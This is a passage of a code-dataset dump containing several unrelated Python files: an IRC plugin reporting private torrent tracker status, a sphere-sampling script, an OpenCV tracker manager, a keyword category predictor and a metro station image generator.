content[\"CableGuy\"],\n content[\"Barney\"],\n 3,\n ]\n status_headers = [\n \"Site\",\n \"API\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Id\",\n \"IRC Announce\",\n \"kenyz\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n btn = wrap(btnStatus, [optional(\"something\")])\n\n def redStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of Redacted site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://red.trackerstatus.info/api/status/\"\n site_name = \"RED\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n red = wrap(redStatus, [optional(\"something\")])\n\n def opsStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of Orpheus site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://ops.trackerstatus.info/api/status/\"\n site_name = \"OPS\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ops = wrap(opsStatus, [optional(\"something\")])\n\n def mtvStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of MTV site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://mtv.trackerstatus.info/api/status/\"\n site_name = \"MTV\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n mtv = wrap(mtvStatus, [optional(\"something\")])\n\n def nwcdStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of NWCD site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://nwcd.trackerstatus.info/api/status/\"\n site_name = \"NWCD\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n content[\"ImageHost\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n \"Image Host\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n nwcd = wrap(nwcdStatus, [optional(\"something\")])\n\n def ptpStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of PTP site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://ptp.trackerstatus.info/api/status/\"\n site_name = \"PTP\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n content[\"TrackerHTTPAddresses\"][\"51.255.35.90\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.51.73\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.54.181\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.54.182\"],\n content[\"TrackerHTTPAddresses\"][\"192.99.58.220\"],\n content[\"IRC\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"IRC Announce\",\n \"IRC ID\",\n \"51.255.35.90\",\n \"164.132.51.73\",\n \"164.132.54.181\",\n \"164.132.54.182\",\n \"192.99.58.220\",\n \"Persona\",\n ]\n breakpoints = [3]\n line_headers = [\"Services: \", \"Trackers: \"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ptp = wrap(ptpStatus, [optional(\"something\")])\n\n def ggnStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of GGN site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://ggn.trackerstatus.info/api/status/\"\n site_name = \"GGn\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"TrackerSSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ggn = wrap(ggnStatus, [optional(\"something\")])\n\n def arStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of AR site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://ar.trackerstatus.info/api/status/\"\n site_name = \"AR\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ar = wrap(arStatus, [optional(\"something\")])\n\n def p32Status(self, irc, msg, args, opts):\n \"\"\"\n Check the status of AR site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://32p.trackerstatus.info/api/status/\"\n site_name = \"32p\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n p32 = wrap(p32Status, [optional(\"something\")])\n\n def ahdStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of AHD site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"https://status.awesome-hd.me\"\n site_name = \"AHD\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*Site.*2x\\ (.*)\".*\\n.*2x\\ (.*)\".*\\n.*2x\\ (.*)\"', content.content.decode()\n )\n print(status_txt)\n status = []\n for i in range(0, 4):\n if status_txt.group(i) == \"green\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[2], status[3]]\n status_headers = [site_name + \" Site\", \"IRC\", \"Tracker\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n ahd = wrap(ahdStatus, [optional(\"something\")])\n\n def abStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of AB site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"http://status.animebytes.tv\"\n site_name = \"AB\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*site.*\\n.*status (.*)\"[\\S\\s]+tracker.*\\n.*status'\n r' (.*)\"[\\S\\s]+irc.*\\n.*status (.*)\"',\n content.content.decode(),\n )\n status = []\n for i in range(0, 4):\n if status_txt.group(i) == \"normal\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[3], status[2]]\n status_headers = [site_name + \" Site\", \"IRC\", \"Tracker\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n ab = wrap(abStatus, [optional(\"something\")])\n\n def empStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of EMP site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"http://about.empornium.ph/\"\n site_name = \"EMP\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>',\n content.content.decode(),\n )\n status = []\n for i in range(0, 5):\n if status_txt.group(i) == \"Online\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[2], status[4], status[3]]\n status_headers = [site_name + \" Site.me\", \"Site.sx\", \"Tracker\", \"IRC\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n emp = wrap(empStatus, [optional(\"something\")])\n\n def nblStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of Nebulance site, tracker, and irc.\n \"\"\"\n url = \"https://status.nebulance.io/status.json\"\n site_name = \"NBL\"\n\n content = WebParser().getWebData(irc, url)\n content2 = content[\"services\"]\n\n status_tmp = [\n content2[\"site\"][\"status\"],\n content2[\"tracker\"][\"status\"],\n content2[\"tracker_ssl\"][\"status\"],\n content2[\"imagehost\"][\"status\"],\n ]\n status = []\n for service in status_tmp:\n if service:\n status.append(1)\n else:\n status.append(0)\n status_headers = [site_name + \" Site\", \"Tracker\", \"Tracker SSL\", \"Image Host\"]\n\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n nbl = wrap(nblStatus, [optional(\"something\")])\n\n # def autoAnnounce(self, irc):\n # \"\"\"Schedule periodic announces for enabled trackers and channels\"\"\"\n # print \"Start\"\n # i = 0\n # for cmd in status_commands:\n # print cmd\n # for channel in irc.state.channels:\n # print \"announce.relay\"+status_trackers[i]\n # if self.registryValue(\"announce.relay\"+status_trackers[i], channel):\n # print \"announce.relay\"+status_trackers[i]\n # try:\n # locals()[\"self.\"+cmd]()\n # except:\n # print \"Failed to query status\"\n # print channel\n # i = +1\n\n\nClass = Trackers\n","sub_path":"Trackers/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":26807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468144718","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#n: dimension\n#M: number of samples\nn = 2\nM = 100\nradius=1.45\n\np_metric = 2\n\nX = np.zeros(n*M)\nfor j in range(0,M):\n Xk = np.random.uniform(-1,1,n)\n\n if p_metric == 1:\n d = np.sum(np.abs(Xk))\n else:\n d = np.sqrt(np.sum(Xk**2))\n\n X[j*n:(j+1)*n] = radius*Xk/d\n\nX = np.reshape(X,(M,n))\nplt.plot(X[:,0],X[:,1],'ok')\n\nt = np.linspace(-np.pi,+np.pi,100)\nplt.plot(radius*np.cos(t),radius*np.sin(t),'-k')\nplt.show()\n","sub_path":"scripts/uniform_sphere_sampling.py","file_name":"uniform_sphere_sampling.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"40050577","text":"import cv2\n\nclass Tracker():\n '''Instantiates the tracker: \n - Number of frames missed\n - Bouding box position\n - Initializes KCF tracker\n '''\n def __init__(self, img, pos):\n self.frames_disapeared = 0\n self.pos = pos # (Xi, Yi, w, h)\n self.trk_center = [int(pos[0] + pos[2]/2), int(pos[1] + pos[3]/2)]\n self.trk = cv2.TrackerKCF_create()\n self.trk.init(img, pos)\n\nclass objects_updator():\n '''Instantiates the object that will manager the trackers (Add, delete and update): \n - List of all trackers\n - Number of frames max that a tracker can be missed (without matches)\n '''\n def __init__(self, max_disapeared = 20):\n self.trackers_list = []\n self.max_disapeared = max_disapeared\n\n # Verifies the matches between trackers and detections, returning new detections, trackers missed, and trackers matches\n def verify_dets(self, dets):\n matched_trk = []\n unmatched_trk = [] \n matched_dets = []\n new_dets = []\n \n for id_trk, trk in enumerate(self.trackers_list):\n for id_det, pos in enumerate(dets):\n xi, yi, xf, yf = [pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]\n if ( trk.trk_center[0] >= xi and trk.trk_center[0] <= xf ) and ( trk.trk_center[1] >= yi and trk.trk_center[1] <= yf ):\n matched_trk.append(id_trk)\n matched_dets.append(id_det)\n \n if id_trk not in matched_trk:\n print(\"Unmatched\")\n unmatched_trk.append(id_trk)\n\n for idx_dets in range(len(dets)):\n if idx_dets not in matched_dets:\n new_dets.append(idx_dets)\n\n return matched_trk, unmatched_trk, new_dets\n\n def update_trks(self, img):\n for idx, trk in enumerate(self.trackers_list):\n (success, trk.pos) = trk.trk.update(img)\n if success:\n (x, y, w, h) = [int(v) for v in trk.pos]\n trk.trk_center = [int(x + w/2), int(y + h/2)] # Tracker centroid\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n else:\n self.trackers_list.pop(idx)\n\n\n def update_dets(self, img, dets):\n # Returns the ID's of the matched/unmatched trackers and the id of new detections\n matched_trk, unmatched_trk, new_dets = self.verify_dets(dets) \n\n for idx in new_dets:\n self.trackers_list.append(Tracker(img, dets[idx]))\n\n for idx in unmatched_trk:\n self.trackers_list[idx].frames_disapeared += 1\n if self.trackers_list[idx].frames_disapeared == self.max_disapeared:\n self.trackers_list.pop(idx)\n\n for idx in matched_trk:\n self.trackers_list[idx].frames_disapeared = 0\n\n return new_dets\n\n\n\n","sub_path":"class_tracker.py","file_name":"class_tracker.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"439740386","text":"import re\nimport Rake\n\n\n\ndef predictCategory(fname):\n with open('vocabulary.txt','r') as voc_ref:\n vocabulary=voc_ref.read()\n vocabulary = re.split('\\n', vocabulary)\n if '' in vocabulary:\n vocabulary.remove('')\n vocabulary = [token.split(':') for token in vocabulary]\n\n voc_dict={}\n for token in vocabulary :\n if len(token)==2:\n voc_dict [token [0]]=token[1]\n\n #tokens=Tokenize(fname)\n\n with open (fname,'r') as text_ref:\n text=text_ref.read()\n\n\n rake_obj = Rake.Rake('stopwords.txt')\n tokens=rake_obj.run(text)\n\n\n\n category = {}\n for token in tokens :\n if token[0] in voc_dict :\n cls= voc_dict[token[0]]\n if cls in category:\n category[cls]+=1\n else:\n category[cls] = 1\n print (category)\n clslist = []\n if category!={}:\n clslist=[]\n x = max(category.values())\n for cls in category:\n if category[cls] == x or category [cls]==x-1:\n clslist .append(cls)\n return clslist","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"85945201","text":"from PIL import Image, ImageDraw, ImageFilter, ImageFont\nimport cairo\nimport math\nimport os\nimport unicodedata\n \nclass Station:\n def __init__(self, key, zhName, enName, namePos, angle, lineNum, color=\"black\", outline=\"white\", thickness=0, interchange=None):\n self.__key = key\n self.__zhName = zhName\n self.__enName = enName\n self.__namePos = namePos\n self.__angle = angle\n self.__lineNum = lineNum\n self.__color = color\n self.__outline = outline\n self.__thickness = thickness\n self.__interchange = interchange\n \n def generate(self):\n circlePath, centerPoints = self.__createCircle(self.__angle, self.__lineNum)\n nameList = self.__createName(self.__zhName, self.__enName, self.__namePos, self.__color, self.__outline, self.__thickness)\n \n self.__mergeImage(Image.open(circlePath), nameList)\n \n def __from_pil(self, im, alpha=1.0, format=cairo.FORMAT_ARGB32):\n \"\"\"\n :param im: Pillow Image\n :param alpha: 0..1 alpha to add to non-alpha images\n :param format: Pixel format for output surface\n \"\"\"\n assert format in (cairo.FORMAT_RGB24, cairo.FORMAT_ARGB32), \"Unsupported pixel format: %s\" % format\n if 'A' not in im.getbands():\n im.putalpha(int(alpha * 256.))\n arr = bytearray(im.tobytes('raw', 'BGRa'))\n surface = cairo.ImageSurface.create_for_data(arr, format, im.width, im.height)\n return surface\n \n # str (path to the png), list (centre point for line)\n def __createCircle(self, angle, lineNum):\n assert type(angle) is int or type(angle) is float, \"not int ot float\"\n assert type(lineNum) is int, \"not int\"\n assert lineNum > 0, \"line number must greater than 0\"\n assert 0 <= angle < 180, \"angle must be greater or equal than 0, and less than 180\"\n \n x = 115 * (lineNum-1) * math.cos( angle * math.pi / 180 )\n y = 115 * (lineNum-1) * math.sin( angle * math.pi / 180 )\n \n width, height = 205 + int(math.ceil(abs(x))),\\\n 205 + int(math.ceil(abs(y)))\n\n im = Image.new(\"RGBA\", (width, height))\n surface = self.__from_pil(im)\n ctx = cairo.Context(surface)\n \n radius = (102.5, 77.5)\n \n for i in range(len(radius)):\n \n \"\"\"\n : CIRCLE SEGMENT\n \"\"\"\n \n for d in (0,1):\n \n ctx.arc(\n 102.5 + x * d - x * int(angle>90),\n 102.5 + y * d,\n radius[i],\n 0,\n math.pi * 2\n )\n \n ctx.close_path()\n ctx.set_source_rgb(i,i,i)\n ctx.fill()\n \n \"\"\"\n : EXTENDED RECTANGLE\n \"\"\"\n \n ctx.move_to( 102.5 - x * int(angle>90), 102.5 )\n ctx.line_to(\n 102.5 + x - x * int(angle>90),\n 102.5 + y\n )\n ctx.set_source_rgb(i,i,i)\n ctx.set_line_width(radius[i]*2)\n ctx.stroke()\n \n \"\"\"\n : CALCULATE CENTRE POINT(S) FOR LINES\n \"\"\"\n \n diff = (\n 115 * math.cos( angle * math.pi / 180 ),\n 115 * math.sin( angle * math.pi / 180 )\n )\n \n center = []\n \n for i in range(lineNum):\n center.append((\n float(\"{0:.5f}\".format(\n 102.5 + x - x * int(angle>90) - diff[0] * (i)\n )),\n float(\"{0:.5f}\".format(\n 102.5 + y - diff[1] * (i)\n ))\n ))\n \n path = \"result/temp_circle.png\"\n surface.write_to_png(path)\n return path, center[::-1]\n \n # list (of Image)\n def __createName(self, zhName, enName, namePos, color=\"black\", outline=\"white\", thickness=4):\n \n assert not (\"E\" in namePos and \"W\" in namePos) and not (\"N\" in namePos and \"S\" in namePos), \"invalid position\"\n \n name = [zhName, enName]\n png_list = []\n \n for d in range(len(name)):\n line = name[d].count(\"\\n\")+1\n size = (67 + 14 if d else 147 + 32) * 1.1 / line\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=int(size)\n )\n name_list = name[d].split(\"\\n\")\n \n maxWidth, maxHeight = 0, 0\n zhAve = []\n lineWidth = []\n for i in range(line):\n \n charWidth = [unicodedata.east_asian_width(char) for char in name_list[i]]\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n name_list[i],\n font=font\n )\n w1, h1 = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n \"hg\",\n font=font\n )\n if w > maxWidth: maxWidth = w\n if h > maxHeight: maxHeight = h\n if h1 > maxHeight and d: maxHeight = h1\n if \"Na\" not in charWidth:\n zhAve.append(w/len(name_list[i]))\n lineWidth.append(1)\n else:\n lineWidth.append(0)\n \n if zhAve: zhAve = sum(zhAve)/len(zhAve)\n else: zhAve = 0\n \n \"\"\"\n : maxWidth indicates the width for every line of the text\n : maxHeight indicates the height for every line of the text\n : zhAve indicates the average value of East Asian character appeared; not include text that have non E.A. character\n : lineWidth[i] indicates whether there are non E.A. character in the text, used for aligning\n \"\"\"\n \n width = maxWidth + thickness*2\n height = maxHeight * line + thickness*2\n \n png = Image.new(\"RGBA\", (width, height))\n png_draw = ImageDraw.Draw(png)\n \n x = math.ceil(maxWidth/2)+thickness\n y = math.ceil(maxHeight/2)+thickness\n \n for i in range(line):\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n name_list[i],\n font=font\n )\n \n x1 = x - (\n (w * int(d or not lineWidth[i]) + zhAve * len(name_list[i]) * lineWidth[i]) * int(\"W\" in namePos or (\"S\" in namePos or \"N\" in namePos) and not (\"E\" in namePos))\n ) / (\n 1 + int((\"S\" in namePos or \"N\" in namePos) and not (\"W\" in namePos))\n ) + (\n (x - thickness) * int(\"W\" in namePos)\n ) - (\n (x - thickness) * int(\"E\" in namePos)\n )\n \n for j in range(-thickness,thickness+1,1):\n for k in range(-thickness,thickness+1,1):\n png_draw.text(\n (\n x1 + j,\n i * maxHeight + k\n ),\n text=name_list[i],\n font=font, fill=outline\n )\n \n png_draw.text(\n (\n x1,\n i * maxHeight\n ),\n text=name_list[i],\n font=font, fill=color\n )\n \n #png.save(\"result/__station__{0}__{1}.png\".format(self.__key, \"en\" if d else \"zh\"))\n png_list.append(png)\n \n return png_list\n \n # centre point(s) of station circle (save as png)\n def __mergeImage(self, station, name, interchange=None):\n \n station_w, station_h = station.size\n zhname_w, zhname_h = name[0].size\n enname_w, enname_h = name[1].size\n \n hd = 20 # Horizontal difference\n \n if \"N\" in self.__namePos or \"S\" in self.__namePos:\n imageHeight = station_h + zhname_h + enname_h\n else:\n imageHeight = max(station_h, zhname_h + enname_h)\n if \"E\" in self.__namePos or \"W\" in self.__namePos:\n imageWidth = station_w + max(zhname_w, enname_w) + hd\n else:\n imageWidth = max(station_w, zhname_w, enname_w)\n \n im = Image.new(\"RGBA\", (imageWidth, imageHeight))\n \n #\"\"\"\n if \"N\" in self.__namePos or \"S\" in self.__namePos:\n station_x = imageWidth//2 - station_w//2\n zhname_x = imageWidth//2 - zhname_w//2\n enname_x = imageWidth//2 - enname_w//2\n if \"E\" in self.__namePos:\n station_x = 0\n zhname_x = station_w + hd\n enname_x = station_w + hd\n if \"W\" in self.__namePos:\n station_x = imageWidth - station_w\n zhname_x = imageWidth - station_w - hd - zhname_w\n enname_x = imageWidth - station_w - hd - enname_w\n if \"E\" in self.__namePos or \"W\" in self.__namePos:\n station_y = imageHeight//2 - station_h//2\n zhname_y = 0\n enname_y = zhname_h\n if \"S\" in self.__namePos:\n station_y = 0\n zhname_y = station_h\n enname_y = station_h + zhname_h\n if \"N\" in self.__namePos:\n station_y = enname_h + zhname_h\n zhname_y = 0\n enname_y = zhname_h\n \n im.paste(station, (station_x, station_y))\n im.paste(name[0], (zhname_x, zhname_y))\n im.paste(name[1], (enname_x, enname_y))\n \n im.save(\"result/__station__{0}.png\".format(self.__key))\n \n os.remove(\"result/temp_circle.png\")\n \nclass Interchange:\n def __init__(self, key, zhName, enName, lineColor, textColor=\"black\", outline=\"white\"):\n self.key = key\n self.zhName = zhName\n self.enName = enName\n self.lineColor = lineColor\n self.textColor = textColor\n self.outline = outline\n \nclass Interchanges:\n def __init__(self, interchange_list=[], direction=\"N\", thickness=0):\n self.__list = interchange_list\n self.__direction = direction\n self.__thickness = thickness\n \n def generate(self):\n interchangePath = self.__createInterchange(self.__list, self.__direction, self.__thickness)\n \n def __from_pil(self, im, alpha=1.0, format=cairo.FORMAT_ARGB32):\n \"\"\"\n :param im: Pillow Image\n :param alpha: 0..1 alpha to add to non-alpha images\n :param format: Pixel format for output surface\n \"\"\"\n assert format in (cairo.FORMAT_RGB24, cairo.FORMAT_ARGB32), \"Unsupported pixel format: %s\" % format\n if 'A' not in im.getbands():\n im.putalpha(int(alpha * 256.))\n arr = 